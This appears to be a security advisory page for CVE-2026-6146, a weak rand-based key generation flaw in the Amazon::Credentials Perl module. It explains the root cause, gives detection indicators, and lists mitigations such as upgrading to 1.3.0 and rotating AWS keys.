CVE-2026-6146 Overview
CVE-2026-6146 affects the Amazon::Credentials Perl module through version 1.2.0. The module obfuscates AWS credentials in memory to protect them from object data dumps. Before version 1.3.0, it derived a 64-bit encryption key using Perl's built-in rand function, which is not cryptographically secure and produces predictable output. An attacker who recovers an obfuscated credential blob can reconstruct the key and reverse the obfuscation. This issue is tracked under CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator.
Critical Impact
Predictable encryption keys allow recovery of obfuscated AWS access keys and secret keys from process memory dumps, log artifacts, or serialized objects.
Affected Products
- Amazon::Credentials for Perl, versions through 1.2.0
- Applications and pipelines that depend on Amazon::Credentials to broker AWS credentials
- CPAN distributions bundling Amazon-Credentials releases prior to 1.3.0
Discovery Timeline
- 2026-05-11 - CVE-2026-6146 published to the National Vulnerability Database
- 2026-05-13 - Last updated in NVD database
Technical Details for CVE-2026-6146
Vulnerability Analysis
The Amazon::Credentials module stores AWS access keys and secret keys in an obfuscated form so that a Data::Dumper or similar object dump cannot trivially reveal them. Obfuscation uses symmetric encryption against a 64-bit key. The key is generated at runtime using Perl's rand built-in. rand relies on a non-cryptographic pseudo-random generator seeded from process state. Its output is predictable and the keyspace is too small for confidentiality guarantees. An attacker with access to an obfuscated credential value, plus knowledge of the seeding context, can brute-force or reconstruct the key and decrypt the original credentials.
Root Cause
The root cause is the use of rand for cryptographic key generation in the credential obfuscation routine. The 64-bit key length compounds the problem because exhaustive search is feasible even when the generator behaves ideally. The fix in version 1.3.0 replaces this key generation with a cryptographically suitable source. See the MetaCPAN Amazon Credentials Source for the vulnerable code path.
Attack Vector
Exploitation requires the attacker to obtain the obfuscated credential blob. Common paths include process memory captures, core dumps, crash reports, serialized objects written to disk, log files that include dumped object state, and shared error reporting telemetry. With the blob in hand, the attacker reproduces the predictable key space, decrypts the value, and recovers the underlying AWS access key ID and secret access key. The resulting credentials can be used directly against AWS APIs.
No verified public exploit code is available. The vulnerability is described in the OpenWall OSS-Security Discussion and the MetaCPAN Amazon Credentials Changes for version 1.3.0.
Detection Methods for CVE-2026-6146
Indicators of Compromise
- Unexpected AWS API calls from IP addresses or user agents that do not match the workload running Amazon::Credentials
- AWS CloudTrail entries showing access key usage outside expected regions, instance roles, or time windows
- Log files, crash dumps, or serialized Perl objects on disk containing obfuscated credential structures from Amazon::Credentials
Detection Strategies
- Inventory Perl environments and CPAN dependency manifests for Amazon-Credentials versions at or below 1.2.0
- Hunt CloudTrail and IAM Access Analyzer findings for anomalous usage of access keys that were ever handled by affected Perl applications
- Search file systems, ticketing systems, and log aggregation platforms for serialized credential objects that may have been exported with obfuscation intact
Monitoring Recommendations
- Forward AWS CloudTrail, GuardDuty, and IAM events into a centralized analytics platform to baseline normal credential use
- Alert on first-seen source IP, ASN, or user agent for any AWS access key tied to systems running affected Perl tooling
- Track CPAN package upgrades through configuration management to confirm Amazon::Credentials reaches version 1.3.0 or later
How to Mitigate CVE-2026-6146
Immediate Actions Required
- Upgrade Amazon::Credentials to version 1.3.0 or later on every host, container image, and build pipeline
- Rotate any AWS access keys that were processed by affected versions, especially long-lived IAM user keys
- Purge crash dumps, debug logs, and serialized object files that may contain obfuscated credential payloads
- Prefer short-lived credentials sourced from IAM roles, IAM Identity Center, or STS over static access keys
Patch Information
The maintainer released Amazon-Credentials 1.3.0, which replaces the weak rand-based key generation with a cryptographically appropriate source. Review the upstream changelog at MetaCPAN Amazon Credentials Changes and pin the dependency to a version greater than or equal to 1.3.0 in cpanfile, Makefile.PL, or dist.ini.
Workarounds
- Where immediate upgrade is not possible, restrict file system and memory access to processes that load Amazon::Credentials to limit blob exposure
- Disable verbose object dumping, Data::Dumper output, and stack-trace logging that may serialize credential objects
- Replace static AWS keys with instance profile or container role credentials so that any recovered blob has limited validity
# Configuration example: enforce a safe minimum version in cpanfile
requires 'Amazon::Credentials', '>= 1.3.0';
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
